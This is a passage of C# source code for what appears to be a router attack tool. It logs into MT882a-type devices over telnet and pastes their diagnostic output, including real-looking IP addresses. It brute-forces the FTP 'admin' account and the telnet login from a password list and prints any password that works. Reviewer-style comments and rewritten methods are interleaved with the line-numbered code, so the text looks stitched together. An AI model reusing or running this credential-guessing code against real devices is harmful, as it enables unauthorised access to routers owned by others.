  2592. Console.WriteLine("{0} -> " + stringdata, myip);
  2593. recv = Sock_scan.Receive(data);
  2594. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2595. Console.WriteLine("{0} -> " + stringdata, myip);
  2596. recv = Sock_scan.Receive(data);
  2597. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2598. Console.WriteLine("{0} -> " + stringdata, myip);
  2599. recv = Sock_scan.Receive(data);
  2600. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2601. Console.WriteLine("{0} -> " + stringdata, myip);
  2602. recv = Sock_scan.Receive(data);
  2603. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2604. Console.WriteLine("{0} -> " + stringdata, myip);
  2605.  
  2606.  
  2607. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip tcp status" + "\r"), SocketFlags.None);
  2608. recv = Sock_scan.Receive(data);
  2609. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2610. Console.WriteLine("{0} -> " + stringdata, myip);
  2611. recv = Sock_scan.Receive(data);
  2612. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2613. Console.WriteLine("{0} -> " + stringdata, myip);
  2614. recv = Sock_scan.Receive(data);
  2615. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2616. Console.WriteLine("{0} -> " + stringdata, myip);
  2617. recv = Sock_scan.Receive(data);
  2618. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2619. Console.WriteLine("{0} -> " + stringdata, myip);
  2620. recv = Sock_scan.Receive(data);
  2621. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2622. Console.WriteLine("{0} -> " + stringdata, myip);
  2623.  
  2624. /*
  2625. MT882a> ip tcp status
  2626. ( 1)tcpRtoAlgorithm 4 ( 2)tcpRtoMin 0
  2627. ( 3)tcpRtoMax 4294967295 ( 4)tcpMaxConn 16
  2628. ( 5)tcpActiveOpens 0 ( 6)tcpPassiveOpens 477
  2629. ( 7)tcpAttemptFails 42 ( 8)tcpEstabResets 22
  2630. ( 9)tcpCurrEstab 1 (10)tcpInSegs 9765
  2631. (11)tcpOutSegs 2549 (12)tcpRetransSegs 389
  2632. (14)tcpInErrs 2 (15)tcpOutRsts 93
  2633. tcbsInUseCnt = 4
  2634. &TCB Rcv-Q Snd-Q Local socket Remote socket State
  2635. 804fdce4 0 621 41.248.40.35:23 196.12.232.120:61565 Estab 0
  2636. 804fd66c 0 0 0.0.0.0:21 0.0.0.0:0 Listen 0
  2637. 804fd558 0 0 0.0.0.0:7547 0.0.0.0:0 Listen (S) 0
  2638. 804fd444 0 0 0.0.0.0:80 0.0.0.0:0 Listen (S) 0
  2639. */
  2640.  
  2641. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("ip udp status" + "\r"), SocketFlags.None);
  2642. recv = Sock_scan.Receive(data);
  2643. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2644. Console.WriteLine("{0} -> " + stringdata, myip);
  2645. recv = Sock_scan.Receive(data);
  2646. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2647. Console.WriteLine("{0} -> " + stringdata, myip);
  2648. recv = Sock_scan.Receive(data);
  2649. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2650. Console.WriteLine("{0} -> " + stringdata, myip);
  2651. recv = Sock_scan.Receive(data);
  2652. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2653. Console.WriteLine("{0} -> " + stringdata, myip);
  2654. recv = Sock_scan.Receive(data);
  2655. stringdata = Encoding.ASCII.GetString(data, 0, recv);
  2656. Console.WriteLine("{0} -> " + stringdata, myip);
  2657.  
  2658.  
  2659.  
  2660. //ATTACK
  2661. /*
  2662. MT882a> ip ping
  2663. Usage: ping <hostid>
  2664. MT882a> ip ping www.google.com
  2665. Resolving www.google.com... 173.194.67.105
  2666. sent rcvd rate rtt avg mdev max min
  2667. 1 1 100 80 80 0 80 80
  2668. 2 2 100 80 80 0 80 80
  2669. 3 3 100 80 80 0 80 80
  2670. */
  2671.  
  2672. /*
  2673. MT882a> ip route
  2674. status add addiface addprivate
  2675. addrom drop
  2676. MT882a> ip route status
  2677. Dest FF Len Device Gateway Metric stat Timer Use RN
  2678. 41.248.40.1 00 32 poe0 41.248.40.1 1 0329 0 0 ISP-0
  2679. 192.168.1.0 00 24 enet0 192.168.1.1 1 041b 0 0
  2680. default 00 0 poe0 ISP-0 2 00ab 0 3245 ISP-0
  2681. */
  2682.  
  2683. /*
  2684. MT882a> ether driver
  2685. cnt status config ackdrop
  2686. macnum ackmode etherppp wan2lan
  2687. MT882a> ether driver cnt
  2688. disp
  2689. MT882a> ether driver cnt disp
  2690. Usage: disp <name>
  2691. MT882a> ether driver status
  2692. Usage: driver status <ch-name>
  2693. MT882a> ether driver config
  2694. Usage: driver config [0|1=auto|normal] [0|1=10|100] [0|1=HD|FD] <ch-name>
  2695. MT882a> ether driver ackdrop
  2696. current ack drop number is 0
  2697. ack drop cnt=0
  2698. Usage: ackdrop <number>
  2699. MT882a> ether driver macnum
  2700. Please input allowed mac number(0~255), 0 means no limitation
  2701. Current allowed mac number: 0
  2702. MT882a> ether driver ackmode
  2703. TCP ACK mode: off
  2704. ACK length: 90
  2705. TCP ACK mode type: Task
  2706. MT882a> ether driver etherppp
  2707. PPP check : on
  2708.  
  2709. MT882a> ether driver wan2lan
  2710. Usage: wan2lan [on||off] <number>
  2711. Current wan2lan feature status: off
  2712. */
  2713.  
  2714.  
  2715.  
  2716. /*
  2717. MT882a> wan
  2718. atm node hwsar adsl
  2719. tsarm
  2720. MT882a> wan atm
  2721. test mpoasendloop oam vcpool
  2722. MT882a> wan atm test
  2723. Usage: test [fix|rand|period|oam|loopback]
  2724. MT882a> wan node
  2725. index display clear save
  2726. ispname enable disable encap
  2727. mux vpi vci qos
  2728. pcr scr mbs cdvt
  2729. wanip remoteip bridge routeip
  2730. nat rip multicast callsch
  2731. service nailedup filter ppp
  2732. mtu default_r
  2733. MT882a> wan node display
  2734. WAN node index = 1
  2735. Active = no
  2736. Route IP = off
  2737. Bridge = off
  2738. Name =
  2739. Encapsulcation <2:PPPoE|3:RFC1483|4:PPPoA|5:Enet Encap> = 0
  2740. Mux <1:LLC|2:VC> = 0
  2741. VPI/VCI = 0 / 0
  2742. PPPoE service name =
  2743. PPP username =
  2744. PPP password =
  2745. PPP authentication <1:PAP|2:CHAP|3:BOTH> = 0
  2746. SUA/NAT is disabled
  2747. Static IP address
  2748. WAN IP address = 0.0.0.0
  2749. Remote IP address = 0.0.0.0
  2750. Remote IP subnet mask = 0.0.0.0
  2751. Idle timeout = 0
  2752. Call scheduling set = 1 1 1 1
  2753. Nailed-up connection = off
  2754. QOS Type <2:CBR|3:UBR|4:rtVBR|5:nrtVBR|6:GFR> = 0
  2755. QOS PCR/SCR/MBS/CDVT = 0, 0, 0, 0
  2756. RIP direction <0:none|1:both|2:in|3:out>= 0
  2757. RIP version <0:RIP-1|1:RIP-2B|2:RIP-2M> = 0
  2758. Multicast <0:IGMP-v2|1:IGMP-v1|2:none> = 0
  2759. Incoming protocol filter set = 1 1 1 1
  2760. Incoming device filter set = 1 1 1 1
  2761. Outgoing protocol filter set = 1 1 1 1
  2762. Outgoing device filter set = 1 1 1 1
  2763. MT882a> wan node wanip
  2764. Usage: wan node wanip <static> <ip address>
  2765. or: wan node wanip <dynamic>
  2766. errcode = -4
  2767. */
  2768.  
  2769.  
  2770.  
  2771. /*
  2772. MT882a> wan adsl
  2773. chandata close coding defbitmap
  2774. linedata open opencmd opmode
  2775. perfdata reset status version
  2776. vendorid utopia nearituid farituid
  2777. cellcnt display rateadap dumpcondition
  2778. sampletime noisegt noisemargin persisttime
  2779. timeinterval defectcheck txgain targetnoise
  2780. txfilter setrvid txtones snroffset
  2781. errorsecond diag watchdog fwversion
  2782. uptime dumprate annex
  2783. MT882a> wan adsl display
  2784. shutdown rateup
  2785. MT882a> wan adsl fwversion
  2786. DMT FwVer: 3.11.2.151_A_TC3086 HwVer: T14F7_5.0
  2787.  
  2788. MT882a> wan adsl utopia
  2789. UTOPIA parameters:
  2790. level: 1
  2791. fast address: 0
  2792. interleaved address: 1
  2793. MT882a> wan adsl coding
  2794. line coding: DMT
  2795. MT882a> wan adsl txtones
  2796. usage: <start tone> <end tone> tone=0x6~0x1F
  2797. current value: start_tone=6 end_tone=1f
  2798. MT882a> wan adsl opmode
  2799. operational mode: ITU G.992.5(ADSL2PLUS)
  2800.  
  2801. MT882a> wan adsl uptime
  2802. ADSL uptime 122:15:16
  2803. MT882a> wan adsl sampletime
  2804. Usage: min
  2805. MT882a> wan adsl linedata
  2806. far near
  2807. MT882a> wan adsl linedata near
  2808. relative capacity occupation: 100%
  2809. noise margin downstream: 37.0 db
  2810. output power upstream: 11.3 dbm
  2811. attenuation downstream: 13.7 db
  2812. MT882a> wan adsl linedata far
  2813. relative capacity occupation: 100%
  2814. noise margin upstream: 34.5 db
  2815. output power downstream: 19.3 dbm
  2816. attenuation upstream: 9.6 db
  2817. carrier load: number of bits per symbol(tone)
  2818. tone 0- 31: 00 00 00 00 02 25 56 66 66 66 66 66 55 44 43 20
  2819. tone 32- 63: 00 00 00 00 00 00 00 00 00 00 04 34 45 55 54 55
  2820. tone 64- 95: 10 44 53 65 53 05 05 56 66 65 53 65 36 65 66 54
  2821. tone 96-127: 55 65 55 45 55 54 45 45 14 55 41 55 45 55 45 51
  2822. tone 128-159: 54 45 54 55 44 55 55 55 55 45 65 45 45 46 54 56
  2823. tone 160-191: 54 55 45 50 04 00 45 05 05 44 54 54 55 35 40 54
  2824. tone 192-223: 55 55 50 45 05 00 55 00 40 00 00 00 00 00 00 00
  2825. tone 224-255: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2826. tone 256-287: 00 00 50 00 00 00 50 00 00 40 00 40 00 00 00 00
  2827. tone 288-319: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2828. tone 320-351: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2829. tone 352-383: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2830. tone 384-415: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2831. tone 416-447: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2832. tone 448-479: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2833. tone 480-511: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  2834.  
  2835. MT882a> dot1q disp
  2836. 802.1Q Tagged-based VLAN: Inactive(1)
  2837.  
  2838. Port | PVID || Port | PVID || Port | PVID || Port | PVID ||
  2839. ------+--------++------+--------++------+--------++------+--------++
  2840. e1 | 1 ||
  2841. p0 | 1 || p1 | 1 || p2 | 1 || p3 | 1 ||
  2842. p4 | 1 || p5 | 1 || p6 | 1 || p7 | 1 ||
  2843. u | 1 ||
  2844. cpu | 15 ||
  2845.  
  2846. No|Act| VID| Name | Egress Port
  2847. --+---+----+-----------+------------------------------------------
  2848. | Tagged Egress Port
  2849. +------------------------------------------
  2850. 0| N | 0| |
  2851. |
  2852. 1| N | 0| |
  2853. |
  2854. 2| N | 0| |
  2855. |
  2856. 3| N | 0| |
  2857. |
  2858. 4| N | 0| |
  2859. |
  2860. 5| N | 0| |
  2861. |
  2862. 6| N | 0| |
  2863. |
  2864. 7| N | 0| |
  2865. |
  2866. 8| N | 0| |
  2867. |
  2868. 9| N | 0| |
  2869. |
  2870. 10| N | 0| |
  2871. |
  2872. 11| N | 0| |
  2873. |
  2874. 12| N | 0| |
  2875. |
  2876. 13| N | 0| |
  2877. |
  2878. 14| Y | 1| vlan14|e1,u,p0,p1,p2,p3,p4,p5,p6,p7
  2879. |
  2880. 15| Y | 15| vlan15|e1,u
  2881. |
  2882. */
  2883.  
  2884.  
  2885.  
  2886.  
  2887.  
  2888.  
  2889. Sock_scan.Close();
  2890. break;
  2891. }
  2892. }
  2893. catch (Exception e)
  2894. {
  2895. Console.WriteLine("DEBUG EXCEPTION02: {0} -> " + e.Message, myip);
  2896. }
  2897. }
  2898. }
  2899. else
  2900. {
  2901. Console.WriteLine("{0} DEBUG no telnet Password: "+banner,myip);
  2902. }
  2903.  
  2904. // Sock_scan.Close();
  2905. }
  2906.  
  // Connects to TCP port 21 on myip, prints the greeting banner, then walks the
  // `passwords` collection (declared elsewhere in this class) for the fixed account
  // name "admin", issuing one USER/PASS pair per entry on the same control connection.
  //
  // Reply handling is a substring test on each reply: "530" is logged as a rejected
  // password, "230" is logged as accepted and ends the loop. The test matches the
  // digits anywhere in the reply text, not only a leading status code.
  //
  // Exceptions inside the loop are caught and printed. Parse, Connect and the banner
  // Receive sit outside any try block, so their exceptions reach the caller and the
  // socket is not closed on that path.
  //
  // Seen from the server, this is a run of USER admin / PASS attempts on one session,
  // each answered with 530; that pattern is what FTP server logs and failed-login
  // rate limits would register.
  2907. public static void ftptry(string myip)
  2908. {
  2909. Console.WriteLine("ftptry");
  2910.  
        // One 1024-byte buffer is reused for the banner and for every reply.
  2911. byte[] data = new byte[1024];
  2912. string stringdata;
  2913. int recv;
  2914.  
  2915. IPAddress adresseIP = IPAddress.Parse(myip);
  2916. IPEndPoint ip = new IPEndPoint(adresseIP, 21);
  2917. Socket Sock_scan = new Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp);
  2918. Sock_scan.Connect(ip);
  2919.  
        // A single Receive is treated as the complete banner.
        // NOTE(review): assumes the whole reply arrives in one read - confirm.
  2920. recv = Sock_scan.Receive(data);
  2921. Console.WriteLine("Banner ftp: " + Encoding.ASCII.GetString(data, 0, recv));
  2922.  
  2923. foreach (string password in passwords)
  2924. {
  2925. try
  2926. {
  2927. Console.WriteLine("{0} -> USER", myip);
        // "USER admin" followed by CR LF (char 13, char 10); char 32 is the space.
  2928. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("USER" + Convert.ToChar(32) + "admin" + Convert.ToChar(13) + Convert.ToChar(10)));
  2929. recv = Sock_scan.Receive(data);
  2930. Console.WriteLine("{0} -> Response ftp: " + Encoding.ASCII.GetString(data, 0, recv), myip);
  2931. //331 Please specify the password.
  2932. //331 Enter PASS command
  2933. //331 User name okay, need password.
  2934.  
  2935. Console.WriteLine("{0} -> PASS", myip);
  2936. Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes("PASS" + Convert.ToChar(32) + password + Convert.ToChar(13) + Convert.ToChar(10)));
  2937. recv = Sock_scan.Receive(data);
  2938. stringdata = Encoding.ASCII.GetString(data, 0, recv);
        // The reply text is concatenated into the format string, so braces in a
        // server reply would be interpreted as format placeholders.
  2939. Console.WriteLine("{0} -> Response ftp: " + stringdata, myip);
  2940. //530 Login incorrect.
  2941. //530 Not logged in.
  2942. //530 User admin cannot log in.
  2943. if (stringdata.Contains("530"))
  2944. {
  2945. Console.Write("{0} -> bad ftp password: {1}\n", myip, password);
  2946. }
  2947. //230 User logged in, proceed.
  2948. if (stringdata.Contains("230"))
  2949. {
  2950. Console.Write("{0} -> FTP PASSWORD IS: {1}\n", myip, password);
  2951. break;
  2952. }
  2953.  
  2954. }
  2955. catch (Exception e)
  2956. {
        // The loop continues with the next entry on the same socket after any failure.
  2957. Console.WriteLine("{0} -> " + e.Message, myip);
  2958. }
  2959. }
  2960.  
        // Only reached when nothing above threw out of the method.
  2961. Sock_scan.Close();
  2962.  
        // Disabled alternative based on FtpWebRequest, kept as a comment by the author.
  2963. /*
  2964. FtpWebRequest reqFTP;
  2965. reqFTP = (FtpWebRequest)FtpWebRequest.Create(new Uri("ftp://" + myip+"/"));
  2966. reqFTP.Credentials = new NetworkCredential("login", "pass");
  2967. reqFTP.KeepAlive = false;
  2968. reqFTP.Method = WebRequestMethods.Ftp.ListDirectory;
  2969. // Get the response from the FTP server
  2970. FtpWebResponse response = (FtpWebResponse)reqFTP.GetResponse();
  2971. Console.WriteLine("{0} -> Réponse FTP:" + response, myip);
  2972.  
  2973. /*
  2974. // Get the response stream
  2975. StreamReader monStreamReader = new StreamReader(response.GetResponseStream(), Encoding.Default);
  2976. //Store the listing in a string
  2977. string listeBrute = monStreamReader.ReadToEnd();
  2978. //Extract all the file names from the string
  2979. string[] liste = listeBrute.Split(Environment.NewLine.ToCharArray()[0]);
  2980. //Return the directory list
  2981. //return liste;
  2982. */
  2983.  
  2984.  
  2985. }
  2986.  
  2987. /*
  2988. public static void ConnectCallback(IAsyncResult ar)
  2989. {
  2990. try
  2991. {
  2992. // Get The connection socket from the callback
  2993. Socket sock1 = (Socket)ar.AsyncState;
  2994. sock1.Blocking = false; // This is a non blocking IO
  2995. if (sock1.Connected)
  2996. {
  2997. // Define a new Callback to read the data
  2998. AsyncCallback recieveData = new AsyncCallback(OnRecievedData);
  2999. // Begin reading data asyncronously
  3000. sock1.BeginReceive(m_byBuff, 0, m_byBuff.Length, SocketFlags.None, recieveData, sock1);
  3001. }
  3002. }
  3003. catch (Exception ex)
  3004. {
  3005. Console.WriteLine(ex.Message, "Setup Recieve callbackProc failed!");
  3006. }
  3007. }
  3008. */
  3009.  
  /// <summary>
  /// Completion callback for an asynchronous connect. Finishes the connect on the
  /// socket carried in <paramref name="ar"/>, logs the remote endpoint and signals
  /// <c>connectDone</c> (declared elsewhere in this class).
  /// </summary>
  /// <param name="ar">Async result whose <c>AsyncState</c> is the connecting <see cref="Socket"/>.</param>
  /// <remarks>
  /// Any exception is logged and swallowed. In that case <c>connectDone</c> is not
  /// set by this method, so a caller waiting on it is not released from here.
  /// </remarks>
  private static void ConnectCallback(IAsyncResult ar)
  {
      try
      {
          // The socket was supplied as the state object when the connect was started.
          Socket connectedSocket = (Socket)ar.AsyncState;

          // EndConnect throws if the connection attempt failed.
          connectedSocket.EndConnect(ar);

          string remoteEndPointText = connectedSocket.RemoteEndPoint.ToString();
          Console.WriteLine("Socket connected to {0}", remoteEndPointText);

          // Tell the waiting side that the connection is established.
          connectDone.Set();

          Console.WriteLine("DEBUG ConnectCallback");
          //cpt_th.Decrementer();
      }
      catch (Exception failure)
      {
          Console.WriteLine("ERROR ConnectCallback: " + failure.ToString());
      }
  }
  3035.  
  /// <summary>
  /// Starts an asynchronous receive on <paramref name="client"/>, with a fresh
  /// <see cref="StateObject"/> as the state passed to <c>ReceiveCallback</c>.
  /// </summary>
  /// <param name="client">Connected socket to read from.</param>
  /// <remarks>Exceptions raised while starting the receive are printed and swallowed.</remarks>
  private static void Receive(Socket client)
  {
      try
      {
          // Per-connection state: the socket, its buffer and the text collected so far.
          StateObject receiveState = new StateObject();
          receiveState.workSocket = client;

          AsyncCallback onDataReceived = new AsyncCallback(ReceiveCallback);

          // Ask for up to BufferSize bytes; the callback continues from there.
          client.BeginReceive(
              receiveState.buffer,
              0,
              StateObject.BufferSize,
              0,
              onDataReceived,
              receiveState);
      }
      catch (Exception failure)
      {
          Console.WriteLine(failure.ToString());
      }
  }
  3053.  
  /// <summary>
  /// Completion callback for <c>BeginReceive</c>. Appends each received chunk to the
  /// state's <c>sb</c> and re-arms the receive. When a read returns no bytes, the
  /// collected text is published in <c>response</c> and <c>receiveDone</c> is
  /// signalled (both declared elsewhere in this class).
  /// </summary>
  /// <param name="ar">Async result whose <c>AsyncState</c> is the <see cref="StateObject"/>.</param>
  /// <remarks>
  /// The text is decoded as ASCII and accumulated until the peer stops sending, and no
  /// upper bound on the accumulated size is applied in this method. Exceptions are
  /// printed and swallowed, in which case <c>receiveDone</c> is not set from here.
  /// </remarks>
  private static void ReceiveCallback(IAsyncResult ar)
  {
      try
      {
          StateObject receiveState = (StateObject)ar.AsyncState;
          Socket source = receiveState.workSocket;

          int byteCount = source.EndReceive(ar);

          if (byteCount <= 0)
          {
              // Nothing more to read: hand over whatever was collected. A result of
              // one character or less leaves `response` untouched.
              if (receiveState.sb.Length > 1)
              {
                  response = receiveState.sb.ToString();
              }

              receiveDone.Set();
              return;
          }

          // Keep what arrived so far and ask for the next chunk.
          string chunk = Encoding.ASCII.GetString(receiveState.buffer, 0, byteCount);
          receiveState.sb.Append(chunk);

          AsyncCallback onDataReceived = new AsyncCallback(ReceiveCallback);
          source.BeginReceive(
              receiveState.buffer,
              0,
              StateObject.BufferSize,
              0,
              onDataReceived,
              receiveState);
      }
      catch (Exception failure)
      {
          Console.WriteLine(failure.ToString());
      }
  }
  3091.  
  3092.  
  /// <summary>
  /// Per-connection state handed to the asynchronous receive callbacks.
  /// </summary>
  public class StateObject
  {
      /// <summary>Size, in bytes, of <see cref="buffer"/>.</summary>
      public const int BufferSize = 256;

      /// <summary>Socket the data is read from; null until assigned by the caller.</summary>
      public Socket workSocket = null;

      /// <summary>Scratch buffer filled by each receive call.</summary>
      public byte[] buffer = new byte[BufferSize];

      /// <summary>Text decoded from all chunks received so far.</summary>
      public StringBuilder sb = new StringBuilder();
  }
  3105.  
  3106.  
  3107.  
  3108.  
  3109.  
  3110.  
  // Separates telnet command sequences from displayable text in one received buffer.
  //
  // Each byte of m_strLineToProcess is widened to a char, then the resulting string is
  // scanned for IAC (declared elsewhere in this class). Text in front of an IAC is
  // copied to the result; DO/DONT/WILL/WONT and SB...SE sequences are stored in
  // m_ListOptions (also declared elsewhere) instead of being displayed.
  //
  // Returns the displayable text, or "" when an exception was caught, because
  // m_strNormalText is only assigned after the loop has completed.
  //
  // The bytes come from the remote peer (see the call in OnRecievedData), so every
  // index computed below is driven by untrusted input.
  3111. private static string ProcessOptions(byte[] m_strLineToProcess)
  3112. {
  3113. string m_DISPLAYTEXT = "";
  3114. string m_strTemp = "";
  3115. string m_strOption = "";
  3116. string m_strNormalText = "";
  3117. bool bScanDone = false;
  3118. int ndx = 0;
  3119. int ldx = 0;
  3120. char ch;
  3121. try
  3122. {
        // Byte-to-char widening, one character per input byte.
  3123. for (int i = 0; i < m_strLineToProcess.Length; i++)
  3124. {
  3125. Char ss = Convert.ToChar(m_strLineToProcess[i]);
  3126. m_strTemp = m_strTemp + Convert.ToString(ss);
  3127. }
  3128.  
  3129. while (bScanDone != true)
  3130. {
  3131. int lensmk = m_strTemp.Length;
  3132. ndx = m_strTemp.IndexOf(Convert.ToString(IAC));
        // IndexOf does not return a value above the string length, so this
        // adjustment is not expected to run.
  3133. if (ndx > lensmk)
  3134. ndx = m_strTemp.Length;
  3135.  
  3136. if (ndx != -1)
  3137. {
  3138. m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
        // Throws when IAC is the last character; the catch below then makes the
        // method return "".
  3139. ch = m_strTemp[ndx + 1];
  3140. if (ch == DO || ch == DONT || ch == WILL || ch == WONT)
  3141. {
        // Three characters: IAC, the verb, the option code. Substring throws if
        // fewer than three remain.
  3142. m_strOption = m_strTemp.Substring(ndx, 3);
  3143. string txt = m_strTemp.Substring(ndx + 3);
        // Same prefix as appended a few lines above, so it is added a second time.
  3144. m_DISPLAYTEXT += m_strTemp.Substring(0, ndx);
  3145. m_ListOptions.Add(m_strOption);
  3146. m_strTemp = txt;
  3147. }
  3148. else
  3149. if (ch == IAC)
  3150. {
        // Assignment, not +=: text accumulated in earlier iterations is replaced.
  3151. m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
  3152. m_strTemp = m_strTemp.Substring(ndx + 1);
  3153. }
  3154. else
  3155. if (ch == SB)
  3156. {
  3157. m_DISPLAYTEXT = m_strTemp.Substring(0, ndx);
  3158. ldx = m_strTemp.IndexOf(Convert.ToString(SE));
        // NOTE(review): Substring's second argument is a length, while ldx is an
        // index into m_strTemp, and IndexOf returns -1 when SE is absent - confirm
        // the intended bounds.
  3159. m_strOption = m_strTemp.Substring(ndx, ldx);
  3160. m_ListOptions.Add(m_strOption);
  3161. m_strTemp = m_strTemp.Substring(ldx);
  3162. }
        // NOTE(review): no branch handles any other character after IAC. m_strTemp
        // is left unchanged in that case, so the loop would repeat on the same IAC -
        // confirm how such input is meant to terminate.
  3163. }
  3164. else
  3165. {
        // No IAC left: the remainder is plain text and the scan ends.
  3166. m_DISPLAYTEXT = m_DISPLAYTEXT + m_strTemp;
  3167. bScanDone = true;
  3168. }
  3169. }
  3170. m_strNormalText = m_DISPLAYTEXT;
  3171. }
  3172. catch (Exception eP)
  3173. {
        // eP.Message is passed as the format string; the second argument is only
        // used if the message happens to contain a placeholder.
  3174. Console.WriteLine(eP.Message, "Application Error!!!");
  3175. //Application.Exit();
  3176. }
  3177. return m_strNormalText;
  3178. }
  3179.  
  // Receive-completion callback for a telnet session.
  //
  // ar.AsyncState is the Socket. The received bytes are read from m_byBuff (declared
  // elsewhere in this class), CR is rewritten to CR LF and LF is dropped, and the
  // result is passed through ProcessOptions to strip telnet option sequences before
  // being printed.
  //
  // If the text contains "Password:", every entry of `passwords` (declared elsewhere)
  // is sent on the socket with a 100 ms pause before each one, and up to 1024 bytes of
  // reply are read and printed. The loop only logs replies that look like a rejection;
  // it has no success branch and no break, so it always runs through the whole list.
  //
  // When EndReceive reports zero bytes the socket is shut down and closed. The method
  // does not start another BeginReceive itself.
  //
  // Seen from the device, this is a burst of password submissions on one telnet
  // session at roughly 100 ms intervals, which is the pattern login-failure counters
  // and session logs would register.
  3180. public static void OnRecievedData(IAsyncResult ar)
  3181. {
  3182. // Get The connection socket from the callback
  3183. Socket sock = (Socket)ar.AsyncState;
  3184. sock.Blocking = false; // This is a non blocking IO
  3185. // Get The data , if any
  3186. int nBytesRec = sock.EndReceive(ar);
  3187. if (nBytesRec > 0)
  3188. {
        // sRecieved is not read again in this method.
  3189. string sRecieved = Encoding.ASCII.GetString(m_byBuff, 0, nBytesRec);
  3190. string m_strLine = "";
  3191. string myline = null;
        // Line-ending normalisation: CR becomes CR LF, a bare LF is discarded.
  3192. for (int i = 0; i < nBytesRec; i++)
  3193. {
  3194. Char ch = Convert.ToChar(m_byBuff[i]);
  3195. switch (ch)
  3196. {
  3197. case '\r':
  3198. m_strLine += Convert.ToString("\r\n");
  3199. break;
  3200. case '\n':
  3201. break;
  3202. default:
  3203. m_strLine += Convert.ToString(ch);
  3204. break;
  3205. }
  3206. }
  3207. try
  3208. {
        // The length is captured before the empty-line substitution below, so an
        // empty line still produces a zero-length array.
  3209. int strLinelen = m_strLine.Length;
  3210. if (strLinelen == 0)
  3211. {
  3212. m_strLine = Convert.ToString("\r\n");
  3213. }
  3214.  
  3215. Byte[] mToProcess = new Byte[strLinelen];
  3216. for (int i = 0; i < strLinelen; i++)
  3217. mToProcess[i] = Convert.ToByte(m_strLine[i]);
  3218. // Process the incoming data
  3219. string mOutText = ProcessOptions(mToProcess);
  3220. //if (mOutText != "")
  3221. // textBox1.AppendText(mOutText);
  3222. myline+=mOutText;
  3223. //Console.WriteLine("Received data: {0}", mOutText);
  3224.  
  3225. // Respond to any incoming commands
  3226. //RespondToOptions();
  3227. }
  3228. catch (Exception ex)
  3229. {
  3230. //Object x = this;
        // ex.Message is used as the format string here.
  3231. Console.WriteLine(ex.Message, "Information!");
  3232. }
  3233. Console.WriteLine("Received data: {0}", myline);
  3234.  
  3235.  
        // myline is still null if the try block above threw before the += ran, in
        // which case this call throws NullReferenceException out of the callback.
  3236. if (myline.Contains("Password:"))
  3237. {
  3238. foreach (string password in passwords)
  3239. {
  3240. Thread.Sleep(100);
  3241. try
  3242. {
  3243. //Sock_scan.Send(System.Text.Encoding.ASCII.GetBytes(password + Convert.ToChar(13) + Convert.ToChar(10)));
        // Sent without a line terminator; the variant with CR LF is the
        // commented-out line above.
  3244. sock.Send(System.Text.Encoding.ASCII.GetBytes(password));
  3245. //Thread.Sleep(100);
  3246. byte[] data = new byte[1024];
  3247. //string banner;
  3248. int recv;
        // NOTE(review): Blocking was set to false at the top of the method, so this
        // synchronous Receive may throw when no data is queued yet - confirm.
  3249. recv = sock.Receive(data);
  3250. string stringdata = Encoding.ASCII.GetString(data, 0, recv);
        // Single-argument overload: no formatting is applied, "{0}" is printed as is.
  3251. Console.WriteLine("{0} -> Response telnet: " + stringdata);
  3252.  
  3253. ///*
  3254. //strRetPage = null;
  3255. //bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  3256. //strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
  3257.  
  3258. //while (bytes > 0)
  3259. //{
  3260. // bytes = Sock_scan.Receive(RecvBytes, RecvBytes.Length, 0);
  3261. // strRetPage = strRetPage + ASCII.GetString(RecvBytes, 0, bytes);
  3262. //}
  3263. //Console.WriteLine("Response telnet: " + strRetPage);
  3264. //*
  3265.  
  3266. //Bad Password!!!
  3267. if (stringdata.Contains("*") || stringdata.Contains("Password:") || stringdata.Contains("Bad Password"))
  3268. {
        // The format string names {1} but only one argument is supplied, so this
        // call throws FormatException, which the catch below handles.
  3269. Console.Write("{0} -> bad telnet password: {1}\n", password);
  3270. }
  3271. }
  3272. catch (Exception e)
  3273. {
        // Single-argument overload again: "{0}" is printed literally.
  3274. Console.WriteLine("{0} -> " + e.Message);
  3275. }
  3276. }
  3277.  
  3278. }
  3279.  
  3280.  
  3281.  
  3282. }
  3283. else
  3284. {
  3285. // If no data was recieved then the connection is probably dead
        // The format string has no placeholder, so RemoteEndPoint is not printed.
  3286. Console.WriteLine("Disconnected", sock.RemoteEndPoint);
  3287. sock.Shutdown(SocketShutdown.Both);
  3288. sock.Close();
  3289. }
  3290. }
  3291.  
  /// <summary>
  /// Resolves the local host name and returns one of its IPv4 addresses as text.
  /// </summary>
  /// <returns>
  /// The last address in the host entry whose family prints as "InterNetwork", or an
  /// empty string when the host entry lists none.
  /// </returns>
  public string LocalIPAddress()
  {
      string lastIpv4 = "";
      IPAddress[] candidates = Dns.GetHostEntry(Dns.GetHostName()).AddressList;

      // Later matches overwrite earlier ones, so the last IPv4 entry is returned.
      for (int index = 0; index < candidates.Length; index++)
      {
          IPAddress candidate = candidates[index];
